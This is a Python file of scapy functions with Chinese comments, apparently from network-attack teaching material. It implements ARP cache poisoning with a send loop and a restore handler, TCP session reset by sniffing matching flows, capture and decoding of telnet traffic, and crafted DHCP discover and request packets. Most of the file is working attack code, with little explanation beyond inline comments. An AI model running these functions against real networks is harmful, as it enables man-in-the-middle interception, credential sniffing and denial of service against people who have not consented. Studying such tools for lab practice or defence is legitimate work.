def tcp_reset(src_ip, dst_ip, dst_port, ifname, src_port=None):
# 本代码主要任务: 搜索匹配过滤条件的数据包,然后使用tcp_monitor_callback方法进行重置会话处理
global global_if
global_if = scapy_iface(ifname)
if src_port is None:
match = "src host " + src_ip + " and dst host " + dst_ip + " and dst port " + dst_port
else:
match = "src host " + src_ip + " and dst host " + dst_ip + " and src port " + src_port + " and dst port " + dst_port
print("开始匹配异常流量" + match)
sniff(prn=tcp_monitor_callback, filter=match, iface=global_if, store=0)
def telnet_monitor(user_filter, ifname):
# 捕获过滤器匹配的流量, 对流量进行解码
PTKS = sniff(prn=telnet_monitor_callback,
filter=user_filter,
store=1,
iface=scapy_iface(ifname),
timeout=60)
wrpcap("telnet.cap", PTKS) # 保持捕获的数据包到文件
hexdump(string) # 解码展示
def telnet_rst(user_filter, ifname):
# 本代码主要任务: 使用过滤器捕获数据包, 把捕获的数据包交给telnet_monitor_callback进行处理
global global_if
global_if = scapy_iface(ifname)
PTKS = sniff(prn=telnet_monitor_callback,
filter=user_filter,
store=1,
iface=global_if,
timeout=60)
wrpcap("temp.cap", PTKS)
print(string)
def DHCP_FULL(ifname, MAC, timeout=3):
global Global_IF
Global_IF = ifname
# 发送DHCP Discover数据包
pool.apply_async(DHCP_Discover_Sendonly, args=(Global_IF, MAC))
# 侦听数据包,使用过滤器filter="port 68 and port 67"进行过滤,把捕获的数据包发送给DHCP_Monitor_Control函数进行处理
sniff(prn=DHCP_Monitor_Control,
filter="port 68 and port 67",
store=0,
iface=scapy_iface(Global_IF),
timeout=timeout)
def sigint_handler(signum, frame): # 定义处理方法
global psrc, hwsrc, mac_src, hwdst, src1, dst1 # 引入全局变量
print("\n执行恢复操作!!!")
# 发送ARP数据包,恢复被毒化设备的ARP缓存
sendp(Ether(src=hwsrc, dst=mac_src) /
ARP(op=2, hwsrc=hwdst, hwdst=mac_src, psrc=src1, pdst=dst1),
iface=scapy_iface(ifname1),
verbose=False)
time.sleep(1)
print("已经恢复 " + src1 + " ARP缓存")
# 退出程序,跳出while True
sys.exit()
def DHCP_Request_Sendonly(ifname, options, param_req_list, wait_time=1):
request = Ether(dst='ff:ff:ff:ff:ff:ff', src=options['MAC'],
type=0x0800) / IP(
src='0.0.0.0', dst='255.255.255.255') / UDP(
dport=67, sport=68) / BOOTP(
op=1,
chaddr=chaddr(options['client_id']),
siaddr=options['Server_IP'],
) / DHCP(options=[
('message-type', 'request'),
('server_id', options['Server_IP']),
('requested_addr', options['requested_addr']),
# Hardware_Type = 1(一个字节),需要添加在client_id前面
('client_id', b'\x01' + options['client_id']),
('param_req_list', param_req_list),
('end')
])
if wait_time != 0:
time.sleep(wait_time)
sendp(request, iface=scapy_iface(ifname), verbose=False)
else:
sendp(request, iface=scapy_iface(ifname), verbose=False)
def arp_spoof(dst, src, ifname): # 定义毒化方法,毒化dst,使dst相信src的mac地址是本机的mac地址
global psrc, hwsrc, mac_src, hwdst, src1, dst1, ifname1 # 声明全局变量,为后续函数使用方便
src1 = src # 为全局变量赋值,src1为被毒化主机地址
dst1 = dst # dst1为被攻击对象的主机地址
ifname1 = ifname # 攻击使用的接口名字
psrc = GET_IP_netifaces.get_ip_address(ifname) # 通过之前编写的方法获取本地ip地址
hwsrc = GET_MAC_netifaces.get_mac_address(ifname) # 获取本地mac地址
mac_src = ARP_Request.arp_request(dst, ifname)[-1] # 获取被攻击主机的真实mac地址
hwdst = ARP_Request.arp_request(src, ifname)[-1] # 获取被毒化主机的真实mac地址
signal.signal(signal.SIGINT,
sigint_handler) # 信号处理,接收到ctrl+c后执行sigint_handler方法
while True:
sendp(Ether(src=hwsrc, dst=mac_src) /
ARP(op=2, hwsrc=hwsrc, psrc=src1, hwdst=mac_src, pdst=dst1),
iface=scapy_iface(ifname1),
verbose=False)
# sendp方法发送二层数据包,源mac地址为本地mac,目的地址为被攻击主机的mac地址,arp数据包中,选项为2(reply),
# 源mac地址为本地mac地址,源ip地址为被毒化主机的ip地址,起到毒化效果,目的mac地址与目的ip地址均为被攻击主机mac及ip地址
# 如果采用dst为二层广播,会造成被伪装设备告警地址重叠(免费arp的效果),并且欺骗效果不稳定,容易抖动!
# pkt.show()
print("发送ARP欺骗数据包!欺骗" + dst + ',本机MAC地址为' + hwsrc + '的MAC地址!!!')
time.sleep(1)
def DHCP_Sinffer(ifname):
sniff(prn=DHCP_Monitor,
filter="port 68 and port 67",
iface=scapy_iface(ifname),
store=0)